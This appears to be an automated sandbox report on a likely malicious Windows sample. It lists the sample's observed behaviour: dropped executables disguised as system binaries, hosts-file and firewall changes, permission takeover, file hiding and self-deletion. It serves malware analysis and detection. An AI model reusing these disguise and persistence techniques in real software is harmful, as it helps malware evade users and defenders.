Analysis Overview
SHA256
0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0
Threat Level: Likely malicious
The file 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N was found to be: Likely malicious.
Malicious Activity Summary
Modifies Windows Firewall
Possible privilege escalation attempt
Sets file to hidden
Drops file in Drivers directory
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
Deletes itself
Indicator Removal: File Deletion
UPX packed file
Drops file in Windows directory
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Runs net.exe
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-12 14:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-12 14:46
Reported
2024-10-12 14:49
Platform
win7-20240903-en
Max time kernel
118s
Max time network
26s
Command Line
Signatures
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | \??\c:\windows\system32\drivers\etc\hosts | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
| File created | \??\c:\windows\system32\drivers\etc\hosts_bak | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
| File opened for modification | \??\c:\windows\system32\drivers\etc\hosts_bak | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
Modifies Windows Firewall
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe | N/A |
| N/A | N/A | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Indicator Removal: File Deletion
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\common files\system\wk.ini | C:\Windows\system32\attrib.exe | N/A |
| File created | C:\Program Files\common files\system\jk.ini | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
| File opened for modification | C:\Program Files\common files\system\jk.ini | C:\Windows\system32\attrib.exe | N/A |
| File created | C:\Program Files\ls.txt | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd | C:\Windows\system32\attrib.exe | N/A |
| File created | C:\Program Files\common files\system\wk.ini | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Fonts\banbecud\Wscntfy.exe | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
| File opened for modification | C:\Windows\Fonts\banbecud | C:\Windows\system32\attrib.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
